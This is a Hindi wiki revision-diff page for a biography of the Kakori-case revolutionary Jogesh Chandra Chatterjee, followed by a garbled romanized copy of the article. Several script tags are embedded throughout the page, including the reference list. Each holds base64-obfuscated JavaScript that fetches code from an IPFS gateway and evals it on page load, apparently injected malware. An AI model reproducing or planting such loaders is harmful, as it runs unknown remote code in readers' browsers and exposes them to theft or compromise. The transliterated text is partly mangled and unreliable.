Difference between revisions of "जोगेशचंद्र चटर्जी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "आजाद" to "आज़ाद")
m (Text replace - "खजाना" to "ख़ज़ाना")
Line 6: Line 6:
 
पुलिस को जोगेशचंद्र चटर्जी की गतिविधियों पर संदेह हुआ तो [[1916]] में उन्हें गिरफ्तार करने का प्रयत्न किया गया, पर वे चुपचाप [[कोलकाता]] चले गए। फिर भी [[9 अक्टूबर]], 1916 को पुलिस ने उन्हें पकड़ ही लिया। गिरफ्तारी के बाद क्रांतिकारियों का रहस्य जानने के लिए उन पर अनेक अमानुषिक अत्याचार किए गए। बंगाल की पुलिस ऐसे अत्याचारों के लिए बहुत बदनाम थी। गुप्त अंगों में बिजली के झटके लगाना, जाड़े में बर्फ की सिल्लियों पर लिटाना, मुंह में मिर्चों भरा तोबड़ा बांधना, दोनों हाथों की हथेलियों को खाट के पाये के नीचे दबाना, नाख़ूनों में सुइयाँ चुभाना आदि ऐसे अत्याचार थे जो क्रांतिकारियों पर किए जाते थे। जोगेश बाबू के साथ भी यही सब हुआ। यहाँ तक की बाल्टी में मल-मूत्र मिलाकर उससे उन्हें नहला दिया गया, मल से भरे कमोड़ में उनका मुंह डाल दिया गया। इस सब के बाद भी पुलिस, दल की कोई बात उनके मुंह से नहीं निकलवा सकी। उन्हें जेल में बंद कर दिया गया। जेल से जोगेशचंद्र चटर्जी [[सितंबर]], [[1920]] को ही बाहर आ सके।  
 
पुलिस को जोगेशचंद्र चटर्जी की गतिविधियों पर संदेह हुआ तो [[1916]] में उन्हें गिरफ्तार करने का प्रयत्न किया गया, पर वे चुपचाप [[कोलकाता]] चले गए। फिर भी [[9 अक्टूबर]], 1916 को पुलिस ने उन्हें पकड़ ही लिया। गिरफ्तारी के बाद क्रांतिकारियों का रहस्य जानने के लिए उन पर अनेक अमानुषिक अत्याचार किए गए। बंगाल की पुलिस ऐसे अत्याचारों के लिए बहुत बदनाम थी। गुप्त अंगों में बिजली के झटके लगाना, जाड़े में बर्फ की सिल्लियों पर लिटाना, मुंह में मिर्चों भरा तोबड़ा बांधना, दोनों हाथों की हथेलियों को खाट के पाये के नीचे दबाना, नाख़ूनों में सुइयाँ चुभाना आदि ऐसे अत्याचार थे जो क्रांतिकारियों पर किए जाते थे। जोगेश बाबू के साथ भी यही सब हुआ। यहाँ तक की बाल्टी में मल-मूत्र मिलाकर उससे उन्हें नहला दिया गया, मल से भरे कमोड़ में उनका मुंह डाल दिया गया। इस सब के बाद भी पुलिस, दल की कोई बात उनके मुंह से नहीं निकलवा सकी। उन्हें जेल में बंद कर दिया गया। जेल से जोगेशचंद्र चटर्जी [[सितंबर]], [[1920]] को ही बाहर आ सके।  
 
==कार्य क्षेत्र==
 
==कार्य क्षेत्र==
अनुशीलन पार्टी बंगाल के बाहर भी अपनी क्रांतिकारी गतिविधियों का विसतार करना चाहती थी। इसके लिए जोगेशचंद्र चटर्जी को [[उत्तर प्रदेश]] भेजा गया। यहाँ उन्होंने [[वाराणसी]] और [[कानपुर]] को अपनी गतिविधियों का केन्द्र बनाया। धीरे-धीरे उनका संपर्क यहाँ के क्रांतिकारियों से हुआ। इनमें शचीन्द्रनाथ सान्याल, [[भगत सिंह]], [[चंद्रशेखर आज़ाद]] और काकोरी कांड के अन्य क्रांतिकारी सम्मिलित थे। [[9 अगस्त]], [[1925]] को [[लखनऊ]] के निकट काकोरी नामक स्थान पर रेलगाड़ी को रोककर कुछ क्रांतिकारियों ने सरकारी खजाना लूट लिया था। इसके बाद देश-भर में गिरफ्तारियाँ हुईं। जोगेशचंद्र चटर्जी कोलकाता में पकड़े गए। इस केस में उन पर भी मुकद्मा चला और आजन्म कैद की सजा हुई। यह सजा उन्होंने जेलों में दुर्व्यवहार के विरूद्ध समय-समय पर भूख हड़ताल करते हुए फतेहगढ़, [[आगरा]] और [[लखनऊ]] की जेलों में पूरी की। [[1937]] में कांग्रेस मंत्रिमंडलों की स्थापना के बाद ही वे रिहा हुए थे।
+
अनुशीलन पार्टी बंगाल के बाहर भी अपनी क्रांतिकारी गतिविधियों का विसतार करना चाहती थी। इसके लिए जोगेशचंद्र चटर्जी को [[उत्तर प्रदेश]] भेजा गया। यहाँ उन्होंने [[वाराणसी]] और [[कानपुर]] को अपनी गतिविधियों का केन्द्र बनाया। धीरे-धीरे उनका संपर्क यहाँ के क्रांतिकारियों से हुआ। इनमें शचीन्द्रनाथ सान्याल, [[भगत सिंह]], [[चंद्रशेखर आज़ाद]] और काकोरी कांड के अन्य क्रांतिकारी सम्मिलित थे। [[9 अगस्त]], [[1925]] को [[लखनऊ]] के निकट काकोरी नामक स्थान पर रेलगाड़ी को रोककर कुछ क्रांतिकारियों ने सरकारी ख़ज़ाना लूट लिया था। इसके बाद देश-भर में गिरफ्तारियाँ हुईं। जोगेशचंद्र चटर्जी कोलकाता में पकड़े गए। इस केस में उन पर भी मुकद्मा चला और आजन्म कैद की सजा हुई। यह सजा उन्होंने जेलों में दुर्व्यवहार के विरूद्ध समय-समय पर भूख हड़ताल करते हुए फतेहगढ़, [[आगरा]] और [[लखनऊ]] की जेलों में पूरी की। [[1937]] में कांग्रेस मंत्रिमंडलों की स्थापना के बाद ही वे रिहा हुए थे।
  
 
जेल से बाहर आने पर जोगेशचंद्र चटर्जी अपनी पुरानी गतिविधियों में पुनः संलग्न हुए ही थे कि [[1940]] में गिरफ्तार करके उन्हें देवली कैम्प जेल में डाल दिया गया। वहाँ के दुर्व्यवहार के विरूद्ध अनशन करने पर वे छोड़ तो दिए गए लेकिन [[1942]] में ‘भारत छोड़ो आंदोलन’ में फिर जेल में डाल दिए गए। अंत में [[19 अप्रैल]], [[1946]] को उनकी रिहाई हुई। स्वतंत्रता के बाद जोगेशचंद्र चटर्जी कांग्रेस के टिकट पर राज्य सभा के सदस्य रहे। [[1958]] में उन्होंने [[दिल्ली]] में समस्त जीवित क्रांतिकारियों का सम्मेलन आयोजित किया था, जिसमें [[स्वामी विवेकानंद]] के छोटे भाई डॉ. भूपेन्द्रनाथ दत्त तथा [[अरविंद घोष]] के छोटे भाई वारीन्द्र कुमार घोष ने भी भाग लिया था। इस अवसर पर [[नेहरू जी]] ने क्रांतिकारियों का सम्मान किया। जोगेश बाबू ने कुल मिलाकर 24 वर्ष जेलों के भीतर काटे और उनके अनशन की अवधि भी 2 वर्ष से अधिक ही रही।  
 
जेल से बाहर आने पर जोगेशचंद्र चटर्जी अपनी पुरानी गतिविधियों में पुनः संलग्न हुए ही थे कि [[1940]] में गिरफ्तार करके उन्हें देवली कैम्प जेल में डाल दिया गया। वहाँ के दुर्व्यवहार के विरूद्ध अनशन करने पर वे छोड़ तो दिए गए लेकिन [[1942]] में ‘भारत छोड़ो आंदोलन’ में फिर जेल में डाल दिए गए। अंत में [[19 अप्रैल]], [[1946]] को उनकी रिहाई हुई। स्वतंत्रता के बाद जोगेशचंद्र चटर्जी कांग्रेस के टिकट पर राज्य सभा के सदस्य रहे। [[1958]] में उन्होंने [[दिल्ली]] में समस्त जीवित क्रांतिकारियों का सम्मेलन आयोजित किया था, जिसमें [[स्वामी विवेकानंद]] के छोटे भाई डॉ. भूपेन्द्रनाथ दत्त तथा [[अरविंद घोष]] के छोटे भाई वारीन्द्र कुमार घोष ने भी भाग लिया था। इस अवसर पर [[नेहरू जी]] ने क्रांतिकारियों का सम्मान किया। जोगेश बाबू ने कुल मिलाकर 24 वर्ष जेलों के भीतर काटे और उनके अनशन की अवधि भी 2 वर्ष से अधिक ही रही।  

Revision as of 13:28, 9 August 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jogeshachandr chatarji (janm- 1895 dhaka zile bangal, mrityu 22 aprail, 1969) kakori kaand ke prasiddh kraantikari the.

jivan parichay

jogeshachandr chatarji ka janm 1895 ee. mean dhaka zila bangal ke gavadiya namak gaanv mean hua tha. unake pita khulana zile mean vyavasay karate the. jogesh ko shiksha prapt karane ke lie kumilla bheja gaya tha. yahian par unaka sanpark prasiddh kraantikari sangathan ‘anushilan samiti’ ke neta vipin chatarji se hua aur ve chhoti umr mean hi kraanti ke rang mean rang ge.

atyachar

pulis ko jogeshachandr chatarji ki gatividhiyoan par sandeh hua to 1916 mean unhean giraphtar karane ka prayatn kiya gaya, par ve chupachap kolakata chale ge. phir bhi 9 aktoobar, 1916 ko pulis ne unhean pak d hi liya. giraphtari ke bad kraantikariyoan ka rahasy janane ke lie un par anek amanushik atyachar kie ge. bangal ki pulis aise atyacharoan ke lie bahut badanam thi. gupt aangoan mean bijali ke jhatake lagana, ja de mean barph ki silliyoan par litana, muanh mean mirchoan bhara tob da baandhana, donoan hathoan ki hatheliyoan ko khat ke paye ke niche dabana, nakhoonoan mean suiyaan chubhana adi aise atyachar the jo kraantikariyoan par kie jate the. jogesh baboo ke sath bhi yahi sab hua. yahaan tak ki balti mean mal-mootr milakar usase unhean nahala diya gaya, mal se bhare kamo d mean unaka muanh dal diya gaya. is sab ke bad bhi pulis, dal ki koee bat unake muanh se nahian nikalava saki. unhean jel mean band kar diya gaya. jel se jogeshachandr chatarji sitanbar, 1920 ko hi bahar a sake.

kary kshetr

anushilan parti bangal ke bahar bhi apani kraantikari gatividhiyoan ka visatar karana chahati thi. isake lie jogeshachandr chatarji ko uttar pradesh bheja gaya. yahaan unhoanne varanasi aur kanapur ko apani gatividhiyoan ka kendr banaya. dhire-dhire unaka sanpark yahaan ke kraantikariyoan se hua. inamean shachindranath sanyal, bhagat sianh, chandrashekhar azad aur kakori kaand ke any kraantikari sammilit the. 9 agast, 1925 ko lakhanoo ke nikat kakori namak sthan par relaga di ko rokakar kuchh kraantikariyoan ne sarakari khazana loot liya tha. isake bad desh-bhar mean giraphtariyaan hueean. jogeshachandr chatarji kolakata mean pak de ge. is kes mean un par bhi mukadma chala aur ajanm kaid ki saja huee. yah saja unhoanne jeloan mean durvyavahar ke virooddh samay-samay par bhookh h datal karate hue phatehagadh, agara aur lakhanoo ki jeloan mean poori ki. 1937 mean kaangres mantrimandaloan ki sthapana ke bad hi ve riha hue the.

jel se bahar ane par jogeshachandr chatarji apani purani gatividhiyoan mean punah sanlagn hue hi the ki 1940 mean giraphtar karake unhean devali kaimp jel mean dal diya gaya. vahaan ke durvyavahar ke virooddh anashan karane par ve chho d to die ge lekin 1942 mean ‘bharat chho do aandolan’ mean phir jel mean dal die ge. aant mean 19 aprail, 1946 ko unaki rihaee huee. svatantrata ke bad jogeshachandr chatarji kaangres ke tikat par rajy sabha ke sadasy rahe. 1958 mean unhoanne dilli mean samast jivit kraantikariyoan ka sammelan ayojit kiya tha, jisamean svami vivekanand ke chhote bhaee d aau. bhoopendranath datt tatha araviand ghosh ke chhote bhaee varindr kumar ghosh ne bhi bhag liya tha. is avasar par neharoo ji ne kraantikariyoan ka samman kiya. jogesh baboo ne kul milakar 24 varsh jeloan ke bhitar kate aur unake anashan ki avadhi bhi 2 varsh se adhik hi rahi.

nidhan

jogeshachandr chatarji ka nidhan 22 aprail, 1969 ee. ko hua tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 330 se 331.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan